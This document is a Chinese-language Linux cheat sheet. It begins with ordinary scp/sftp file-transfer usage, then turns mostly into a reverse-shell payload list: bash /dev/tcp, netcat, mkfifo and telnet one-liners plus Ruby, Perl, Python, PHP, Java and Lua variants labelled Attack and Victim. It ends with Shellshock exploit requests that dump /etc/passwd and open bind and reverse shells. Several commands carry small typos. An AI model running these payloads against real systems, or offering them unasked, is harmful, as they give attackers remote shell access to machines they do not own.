Linux下终端实现文件上传与反弹

sz 文件名.txt           #下载的文件
rz c:\filename.txt     #上传windows下会弹出选择框让您选择文件

#上传到远程
scp localfile.txt root@RemoteHost:/tmp/upfile.txt

#下载到本地
scp root@RemoteHost:/tmp/remotefile.txt D:\Downloadfile.txt

# 语法参数
usage: sftp [-46aCfpqrv] [-B buffer_size] [-b batchfile] [-c cipher]
    [-D sftp_server_path] [-F ssh_config] [-i identity_file] [-l limit]
    [-o ssh_option] [-P port] [-R num_requests] [-S program]
    [-s subsystem | sftp_server] host

# 链接格式
sftp [user@]host[:file ...]
sftp [user@]host[:dir[/]]
sftp -b batchfile [user@]host
# - 登录
sftp -o port=1000 username@remote ip
# - 上传
put /path/filename(本地主机) /path/filename(远端主机)
# - 下载
get /path/filename(远端主机) /path/filename(本地主机)

# 示例1.采用密匙来登录到指定的sftp服务器上并下载文件或目录到本地
sftp -P 2222 -i /root/.ssh/id_rsa sftpuser@192.168.1.215
# 下载sftp服务中index.php文件到本地
sftp> get /var/www/html/index.php /tmp/
# 下载sftp服务中dir1目录及其子目录文件到本地
sftp> get -r /remote/dir1 .
# 上传本地文件到sftp服务器之中
sftp> put /tmp/weiyigeek.pdf /var/www/html/

AttackIP：Kail  192.168.200.252
ClientIP：Centos 192.168.200.200

/bin/bash -i >& /dev/tcp/10.24.87.54/4444 0>&1   #Client
nc -lvvp 4433  #Attack

/bin/bash -i > /dev/tcp/10.2.10.16/4444 0<&1 2>&1
0<&196;exec 196<>/dev/tcp/192.168.200.252/4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/192.168.200.252/4444
# or:
exec 5<>/dev/tcp/192.168.200.252/4444 ; while read line 0<&5; do $line 2>&5 >&5; done

Hacker: nc -nvlp 4444
Victim: /bin/bash -i > /dev/tcp/192.168.200.252/4444 0<&1 2>&1

#可使用metasploit来获取shell
msfconsle
use exploit/multi/handler

ruby -rsocket -e 'f=TCPSocket.open("192.168.200.200","4444").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'   #可将sh->bash

perl -e 'use Socket;$i="10.24.87.54";$p=14444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.24.87.54",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty;pty.spawn("/bin/sh")'   #可以在低权限用来sudo 获取高级权限

php -r '$sock=fsockopen("192.168.200.252",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.200.252/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

lua5.3 -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.200.200','4444');os.execute('/bin/sh -i <&3 >&3 2>&3');"

#反向连接
nc -e /bin/sh 192.168.200.252 4444  #Client
nc -lvvp 4444 #Attack

#反向连接
mknod /tmp/backpipe p && /bin/sh 0</tmp/back pipe | nc 192.168.200.254 4444 1>/tmp/backpipe
nc -lvnp 4444  #Attack

#Client端
# 如果 -e 参数被禁用，可以尝试以下命令
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.200.252 4443 0</tmp/
# 如果你安装错了 netcat 的版本，请尝试以下命令
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.200.252 4444>/tmp/f

#Attacker
nc -lvnp 4444

Hacker: nc -nvlp 4444
Hacker: nc -nvlp 8888
Victim: telnet 192.168.200.252 4444 | /bin/bash | telnet 192.168.200.252 8888

mknod /tmp/backpipe p && telnet 192.168.200.252 4444 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe
#mknod a p; telnet x.x.x.x 2222 0<a | /bin/bash 1>a

# 一个发现并利用服务器 Shellshock 的工具
./shocker.py -H 192.168.1.1  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
# 查看文件
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
 
# 绑定 shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
 
# 反弹 Shell
$ nc -l -p 443
$ echo "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80